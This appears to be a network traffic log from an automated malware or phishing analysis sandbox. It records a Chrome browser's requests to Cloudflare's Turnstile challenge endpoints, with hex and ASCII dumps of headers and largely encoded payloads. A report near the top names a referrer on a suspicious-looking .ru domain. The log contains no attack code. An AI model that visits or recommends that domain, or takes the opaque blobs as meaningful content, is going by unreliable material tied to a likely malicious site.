                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:58 UTC434OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 37 6d 2e 6b 63 7a 63 79 6c 76 6a 75 62 75 2e 72 75 2f 78 4a 45 6f 62 33 56 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 38 2e 31 38 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72
                                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":332,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://d7m.kczcylvjubu.ru/xJEob3V/","sampling_fraction":1.0,"server_ip":"104.21.78.181","status_code":404,"type":"http.error"},"type":"network-err
                                                                                                        2024-12-18 22:16:59 UTC168INHTTP/1.1 200 OK
                                                                                                        Content-Length: 0
                                                                                                        date: Wed, 18 Dec 2024 22:16:58 GMT
                                                                                                        Via: 1.1 google
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.449773104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:59 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:59 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 18 Dec 2024 22:16:59 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: hJVkZ4JBxNEuENGkfPY8LeRPUzKSAd0aFSw=$IH68yVBnai7eIVDg
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f42853b88ac0f53-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:59 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.449776104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:59 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f4285124e7ede94/1734560216957/tPFTqUIKTrQaUVs HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:00 UTC200INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:59 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f42853e1a8e42e7-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:17:00 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4c 00 00 00 3f 08 02 00 00 00 c5 43 b9 13 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRL?CIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.449778104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:01 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f4285124e7ede94/1734560216957/tPFTqUIKTrQaUVs HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:01 UTC200INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:17:01 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f428548fddaf791-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:17:01 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4c 00 00 00 3f 08 02 00 00 00 c5 43 b9 13 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRL?CIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.449780104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:01 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f4285124e7ede94/1734560216958/0e5d024cec808bfbcf86376e9ceaa57ac340fc44d57c7e7275e86b26749de3f8/PF-ArXgsbeKP5qc HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: max-age=0
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:02 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                        Date: Wed, 18 Dec 2024 22:17:01 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Content-Length: 1
                                                                                                        Connection: close
                                                                                                        2024-12-18 22:17:02 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 44 6c 30 43 54 4f 79 41 69 5f 76 50 68 6a 64 75 6e 4f 71 6c 65 73 4e 41 5f 45 54 56 66 48 35 79 64 65 68 72 4a 6e 53 64 34 5f 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gDl0CTOyAi_vPhjdunOqlesNA_ETVfH5ydehrJnSd4_gAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                        2024-12-18 22:17:02 UTC1INData Raw: 4a
                                                                                                        Data Ascii: J


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.449782104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:03 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 31490
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 0
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: 8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:03 UTC16384OUTData Raw: 76 5f 38 66 34 32 38 35 31 32 34 65 37 65 64 65 39 34 3d 48 41 31 55 56 44 6b 42 78 53 41 6b 78 71 42 6b 70 24 35 24 77 71 51 6b 54 24 63 53 55 50 2d 37 55 51 65 6d 44 24 4b 5a 24 71 78 44 61 70 24 33 55 44 73 79 6d 57 24 55 55 39 32 42 55 24 64 31 24 42 4c 7a 6d 34 44 44 76 6b 24 6b 4d 24 52 65 66 25 32 62 31 24 53 31 24 33 47 55 51 48 4a 57 33 59 76 55 24 6a 52 55 71 79 24 33 71 6d 6b 78 64 67 31 4e 7a 24 52 51 55 53 30 7a 24 58 59 64 69 50 24 4a 4f 62 31 6a 78 31 24 24 30 7a 24 61 34 24 78 50 55 6b 61 24 57 65 24 39 55 24 70 42 55 44 70 32 42 71 6f 72 24 6d 73 36 65 4f 47 4c 67 53 76 24 6b 76 6f 36 4e 53 47 41 74 31 4c 24 36 35 64 24 4d 65 78 52 59 6b 6e 24 24 41 73 78 69 76 32 39 55 6b 37 58 6f 30 6f 49 74 32 2d 68 6a 50 24 37 77 74 4b 50 77 64 66 35
                                                                                                        Data Ascii: v_8f4285124e7ede94=HA1UVDkBxSAkxqBkp$5$wqQkT$cSUP-7UQemD$KZ$qxDap$3UDsymW$UU92BU$d1$BLzm4DDvk$kM$Ref%2b1$S1$3GUQHJW3YvU$jRUqy$3qmkxdg1Nz$RQUS0z$XYdiP$JOb1jx1$$0z$a4$xPUka$We$9U$pBUDp2Bqor$ms6eOGLgSv$kvo6NSGAt1L$65d$MexRYkn$$Asxiv29Uk7Xo0oIt2-hjP$7wtKPwdf5
                                                                                                        2024-12-18 22:17:03 UTC15106OUTData Raw: 72 6e 39 54 37 32 70 79 4e 51 71 45 5a 58 44 67 2b 64 32 47 41 4e 51 6d 6b 74 47 4c 31 24 62 51 24 24 6b 67 67 6b 71 31 24 6b 65 74 45 4b 24 6b 68 24 33 50 51 6a 55 4c 55 7a 4a 6b 46 47 69 51 52 7a 53 24 6d 7a 24 4f 64 44 55 6b 65 24 47 24 71 7a 6b 4d 24 35 24 6b 32 6b 42 6a 62 42 70 64 24 52 24 50 55 71 77 7a 4c 24 53 32 6b 66 48 32 55 53 57 44 41 6b 68 30 65 7a 71 51 6b 36 24 4e 7a 24 57 55 2d 24 69 7a 59 50 6b 48 24 4d 55 6b 64 6b 72 24 6a 64 6d 32 6b 58 24 52 32 71 4c 24 59 24 4e 30 34 32 6b 48 73 65 55 51 6a 49 6e 67 51 24 44 79 6b 75 24 48 24 6b 36 6b 34 24 50 32 24 39 6b 34 24 65 55 51 50 24 32 24 53 7a 31 36 6b 4c 31 6a 78 53 52 24 47 24 41 78 24 44 49 71 24 59 24 6b 45 6b 4b 24 5a 4a 44 4e 4b 4c 31 65 7a 57 31 6b 75 24 2b 6c 6b 4c 24 69 24 36 24
                                                                                                        Data Ascii: rn9T72pyNQqEZXDg+d2GANQmktGL1$bQ$$kggkq1$ketEK$kh$3PQjULUzJkFGiQRzS$mz$OdDUke$G$qzkM$5$k2kBjbBpd$R$PUqwzL$S2kfH2USWDAkh0ezqQk6$Nz$WU-$izYPkH$MUkdkr$jdm2kX$R2qL$Y$N042kHseUQjIngQ$Dyku$H$k6k4$P2$9k4$eUQP$2$Sz16kL1jxSR$G$Ax$DIq$Y$kEkK$ZJDNKL1ezW1ku$+lkL$i$6$
                                                                                                        2024-12-18 22:17:04 UTC330INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:17:03 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 26300
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: fPr/m5NYj9YSF1ivr+kY97crIgWVOomcU41EOKkG78q+WExiEQFmoIY76OryfUpJt5tFUHeB2AiDTGli$yfRhS0YygqtJzRvz
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4285556ab24282-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:17:04 UTC1039INData Raw: 54 58 35 6f 62 33 4f 46 62 5a 4a 70 6d 47 57 55 63 47 5a 76 64 6e 32 4d 62 34 4b 63 64 6c 65 47 6f 48 70 33 6e 5a 39 2b 6e 57 71 73 6d 47 31 38 70 6f 36 47 6c 71 47 58 70 4c 61 6a 64 5a 61 75 6d 58 79 7a 74 4b 79 69 74 4d 43 30 76 4b 72 47 72 49 61 46 79 72 2b 64 73 4d 50 4c 6b 64 58 54 30 70 4c 42 79 71 58 48 30 4e 79 78 34 4d 2f 64 74 39 53 6a 74 4c 54 51 77 4e 2f 73 77 63 53 36 77 39 7a 45 76 38 48 63 71 38 37 34 7a 65 37 36 30 71 36 34 31 62 66 65 76 4c 33 54 39 64 48 66 32 76 67 41 2b 74 37 58 33 51 37 66 42 39 37 7a 30 51 34 4b 42 77 6e 72 30 73 77 49 42 52 38 57 36 76 6a 65 31 50 6e 39 34 2f 48 68 43 42 51 48 2f 66 54 6c 44 66 37 2b 45 43 67 45 41 67 63 67 46 69 77 58 47 78 72 31 45 79 77 67 44 53 4d 66 50 43 34 77 4d 7a 51 35 42 52 6f 6e 49 55 38
                                                                                                        Data Ascii: TX5ob3OFbZJpmGWUcGZvdn2Mb4KcdleGoHp3nZ9+nWqsmG18po6GlqGXpLajdZaumXyztKyitMC0vKrGrIaFyr+dsMPLkdXT0pLByqXH0Nyx4M/dt9SjtLTQwN/swcS6w9zEv8Hcq874ze760q641bfevL3T9dHf2vgA+t7X3Q7fB97z0Q4KBwnr0swIBR8W6vje1Pn94/HhCBQH/fTlDf7+ECgEAgcgFiwXGxr1EywgDSMfPC4wMzQ5BRonIU8
                                                                                                        2024-12-18 22:17:04 UTC1369INData Raw: 57 63 6e 71 57 57 33 6c 2b 67 46 64 34 57 58 78 79 65 6d 47 6e 64 57 65 71 73 5a 32 6b 73 72 53 53 71 36 70 78 65 59 4f 57 70 5a 71 6e 73 33 6d 59 6c 36 47 73 6c 4a 32 34 67 72 47 56 6c 71 4b 6b 6a 6f 76 50 6b 63 36 77 6a 36 48 44 32 4b 6a 59 73 4a 4c 5a 73 4a 6e 41 74 4c 71 77 6e 4b 50 66 75 61 65 31 73 73 4f 38 35 39 71 72 30 4f 44 41 37 75 79 77 73 65 48 51 32 50 6d 33 31 66 6a 4b 32 2f 72 39 33 63 32 31 77 4f 54 64 33 4d 66 65 31 64 37 39 35 65 37 4b 38 64 76 6b 7a 66 49 4b 30 78 62 59 46 65 6e 38 31 41 76 78 43 4e 2f 32 44 78 48 64 32 79 6a 79 42 53 6b 63 47 41 6f 65 48 69 59 4d 2f 75 38 47 45 41 6e 79 46 67 73 49 4c 43 59 61 50 6a 59 36 50 51 35 42 2b 54 6c 43 52 2f 30 48 46 44 70 44 4b 53 34 75 4b 30 51 4a 48 77 5a 49 45 6b 59 73 43 77 78 59 52 6b
                                                                                                        Data Ascii: WcnqWW3l+gFd4WXxyemGndWeqsZ2ksrSSq6pxeYOWpZqns3mYl6GslJ24grGVlqKkjovPkc6wj6HD2KjYsJLZsJnAtLqwnKPfuae1ssO859qr0ODA7uywseHQ2Pm31fjK2/r93c21wOTd3Mfe1d795e7K8dvkzfIK0xbYFen81AvxCN/2DxHd2yjyBSkcGAoeHiYM/u8GEAnyFgsILCYaPjY6PQ5B+TlCR/0HFDpDKS4uK0QJHwZIEkYsCwxYRk
                                                                                                        2024-12-18 22:17:04 UTC1369INData Raw: 6b 47 53 64 5a 5a 69 47 67 6f 5a 31 6f 6f 36 4d 6b 48 71 61 68 71 69 43 62 59 79 4c 68 71 71 33 76 59 65 37 65 62 57 57 73 4c 6d 77 6d 72 65 2b 6c 72 2b 37 67 36 47 72 75 38 65 49 7a 63 43 39 71 36 6d 4f 7a 49 72 5a 30 59 32 35 72 4b 6e 62 76 70 4f 59 6d 5a 71 34 35 38 48 48 70 62 6a 43 74 73 32 37 32 73 58 69 78 72 37 45 36 66 58 7a 38 63 54 73 30 4f 54 51 32 65 79 35 2b 66 76 42 30 65 2f 46 32 2b 62 58 77 74 55 43 43 2b 33 59 35 50 48 65 37 42 4d 56 34 68 55 52 46 67 72 61 45 66 66 70 33 68 54 59 2b 65 34 54 33 66 6b 5a 43 65 50 33 4c 52 34 63 41 50 63 6b 41 67 50 39 37 69 38 57 45 67 45 4c 42 52 55 64 44 2f 51 30 45 68 55 4d 2f 6a 59 6b 52 79 41 62 4a 77 51 31 52 6b 30 4c 4b 68 73 71 50 6a 45 74 52 53 67 71 46 67 78 59 4e 30 39 53 48 42 6b 79 46 42 31
                                                                                                        Data Ascii: kGSdZZiGgoZ1oo6MkHqahqiCbYyLhqq3vYe7ebWWsLmwmre+lr+7g6Gru8eIzcC9q6mOzIrZ0Y25rKnbvpOYmZq458HHpbjCts272sXixr7E6fXz8cTs0OTQ2ey5+fvB0e/F2+bXwtUCC+3Y5PHe7BMV4hURFgraEffp3hTY+e4T3fkZCeP3LR4cAPckAgP97i8WEgELBRUdD/Q0EhUM/jYkRyAbJwQ1Rk0LKhsqPjEtRSgqFgxYN09SHBkyFB1
                                                                                                        2024-12-18 22:17:04 UTC1369INData Raw: 57 6d 72 6e 33 75 41 69 34 57 75 70 4c 57 6e 71 6f 43 52 6a 5a 46 35 75 36 2b 4c 74 70 75 56 76 35 37 46 74 37 75 56 77 61 69 30 6b 35 32 4a 72 72 6e 4c 70 37 36 4d 6a 71 57 75 79 4e 47 56 74 63 6d 34 73 36 66 65 71 4d 79 71 75 36 48 6b 30 64 47 61 77 74 6a 69 32 4c 2f 66 35 65 79 2f 35 4e 50 45 76 38 47 2f 30 75 4f 73 33 4f 33 4c 75 4f 73 41 2b 39 41 46 31 74 6a 65 7a 2b 58 59 32 67 44 4c 35 41 38 4a 37 77 6f 47 7a 76 7a 71 79 4f 37 70 34 65 58 6a 39 74 72 55 2b 64 6a 54 2b 79 49 4f 2f 51 62 68 4a 52 77 4c 48 2f 59 6d 4a 53 41 41 38 66 45 44 37 75 7a 6f 37 69 6b 78 43 77 38 53 47 66 76 35 4d 53 45 58 46 42 6f 31 41 41 45 35 46 79 4d 64 49 67 6c 47 54 53 34 6a 4a 7a 31 4d 51 30 73 58 4d 30 59 36 4e 54 67 55 50 6a 6f 61 58 55 78 6a 48 6c 4d 64 53 46 73 2f
                                                                                                        Data Ascii: Wmrn3uAi4WupLWnqoCRjZF5u6+LtpuVv57Ft7uVwai0k52JrrnLp76MjqWuyNGVtcm4s6feqMyqu6Hk0dGawtji2L/f5ey/5NPEv8G/0uOs3O3LuOsA+9AF1tjez+XY2gDL5A8J7woGzvzqyO7p4eXj9trU+djT+yIO/QbhJRwLH/YmJSAA8fED7uzo7ikxCw8SGfv5MSEXFBo1AAE5FyMdIglGTS4jJz1MQ0sXM0Y6NTgUPjoaXUxjHlMdSFs/
                                                                                                        2024-12-18 22:17:04 UTC1369INData Raw: 4b 4d 67 6f 53 32 69 4c 65 74 72 5a 69 44 74 62 68 31 70 37 69 52 6f 58 2b 68 72 59 48 41 77 4d 54 48 6e 70 62 43 79 36 47 75 79 4d 71 6c 30 4e 44 58 30 34 2b 30 7a 74 47 76 33 72 53 2f 31 62 44 69 75 61 7a 41 74 63 4c 5a 32 4c 33 4b 6e 73 43 75 78 4e 44 47 30 37 44 79 33 64 44 4a 7a 61 2f 45 78 66 4c 53 36 74 66 51 2b 37 67 46 39 63 4c 68 30 50 45 4a 32 73 50 74 79 51 55 51 78 67 37 4d 7a 4e 7a 31 34 50 41 50 2b 4f 55 4c 47 39 58 72 39 77 38 4d 38 66 30 42 42 66 51 44 38 42 54 33 47 68 76 6f 41 41 6a 76 42 77 62 37 49 2f 49 47 4f 53 66 35 42 69 76 37 4a 77 30 49 4c 2f 6b 4f 48 6a 73 6a 48 69 4d 68 50 68 51 6e 51 77 6b 61 51 53 56 4c 4b 53 30 55 46 43 38 67 47 44 59 6f 54 42 51 34 4d 6a 77 70 51 6a 70 6c 50 54 6f 37 61 56 64 70 4e 6a 64 58 50 30 42 4a 4b
                                                                                                        Data Ascii: KMgoS2iLetrZiDtbh1p7iRoX+hrYHAwMTHnpbCy6GuyMql0NDX04+0ztGv3rS/1bDiuazAtcLZ2L3KnsCuxNDG07Dy3dDJza/ExfLS6tfQ+7gF9cLh0PEJ2sPtyQUQxg7MzNz14PAP+OULG9Xr9w8M8f0BBfQD8BT3GhvoAAjvBwb7I/IGOSf5Biv7Jw0IL/kOHjsjHiMhPhQnQwkaQSVLKS0UFC8gGDYoTBQ4MjwpQjplPTo7aVdpNjdXP0BJK
                                                                                                        2024-12-18 22:17:04 UTC1369INData Raw: 67 70 36 36 76 68 70 36 61 74 58 6d 71 72 61 43 64 6f 36 46 2b 76 35 4b 36 76 5a 32 72 71 4b 76 4c 78 4b 36 66 76 37 4f 33 73 38 75 6c 73 70 65 6c 79 38 2b 62 6e 62 6e 56 6e 38 79 2b 32 37 57 79 73 39 6a 69 31 4d 33 68 77 62 72 5a 30 73 54 6e 7a 2b 66 59 38 37 48 58 79 4e 33 55 32 50 48 4f 30 39 72 32 35 64 62 67 77 4f 58 68 34 38 50 74 41 65 6a 72 36 64 77 46 35 41 45 44 43 67 34 52 2b 52 48 6f 48 41 77 54 46 78 6e 37 46 4e 2f 68 2f 51 4d 65 34 52 4d 57 43 51 59 4d 43 75 59 6f 2b 69 4d 6d 42 68 51 52 46 44 51 74 46 77 67 6f 48 43 41 63 4e 41 34 62 41 41 34 30 4f 7a 39 42 4b 54 35 43 52 53 31 43 43 46 45 77 52 6b 73 76 4b 45 6b 35 4b 7a 46 4d 4b 53 38 7a 55 78 6f 2b 50 6b 42 57 4a 54 67 2f 53 47 41 30 53 46 35 67 51 56 42 4e 4f 6b 46 51 61 46 4a 48 55 45
                                                                                                        Data Ascii: gp66vhp6atXmqraCdo6F+v5K6vZ2rqKvLxK6fv7O3s8ulspely8+bnbnVn8y+27Wys9ji1M3hwbrZ0sTnz+fY87HXyN3U2PHO09r25dbgwOXh48PtAejr6dwF5AEDCg4R+RHoHAwTFxn7FN/h/QMe4RMWCQYMCuYo+iMmBhQRFDQtFwgoHCAcNA4bAA40Oz9BKT5CRS1CCFEwRksvKEk5KzFMKS8zUxo+PkBWJTg/SGA0SF5gQVBNOkFQaFJHUE
                                                                                                        2024-12-18 22:17:04 UTC1369INData Raw: 65 35 36 75 74 4c 71 77 73 37 6d 2b 73 4c 61 39 68 73 79 73 77 4d 61 43 72 4d 57 51 6e 72 4c 49 75 4d 69 35 79 36 7a 49 79 74 53 77 73 72 76 55 32 74 44 46 32 4b 50 55 76 64 33 69 32 4d 62 67 30 4f 44 50 35 4f 72 53 30 4f 72 48 2b 4e 66 74 7a 4e 4c 58 38 37 76 57 32 2f 62 55 34 74 37 33 32 50 44 69 2f 65 7a 38 36 51 58 67 35 76 34 47 43 77 48 70 43 68 44 69 39 77 2f 73 2b 76 30 53 46 2f 6f 42 46 74 34 6c 41 78 6f 66 2f 68 63 64 44 51 73 4f 4a 51 45 68 45 69 51 46 45 78 4d 71 43 51 38 54 4c 54 4d 58 46 7a 45 68 4c 52 59 32 4a 52 73 6c 4f 54 38 35 4a 44 30 4a 46 79 31 42 4d 46 45 76 52 55 74 46 4e 6b 6f 35 4c 7a 68 52 4c 55 30 36 55 44 45 37 51 6c 67 67 50 30 46 5a 53 56 56 58 58 7a 30 66 51 6d 4a 6e 50 30 31 6d 52 56 31 54 61 6c 6c 54 56 6d 78 4e 56 31 74
                                                                                                        Data Ascii: e56utLqws7m+sLa9hsyswMaCrMWQnrLIuMi5y6zIytSwsrvU2tDF2KPUvd3i2Mbg0ODP5OrS0OrH+NftzNLX87vW2/bU4t732PDi/ez86QXg5v4GCwHpChDi9w/s+v0SF/oBFt4lAxof/hcdDQsOJQEhEiQFExMqCQ8TLTMXFzEhLRY2JRslOT85JD0JFy1BMFEvRUtFNko5LzhRLU06UDE7QlggP0FZSVVXXz0fQmJnP01mRV1TallTVmxNV1t
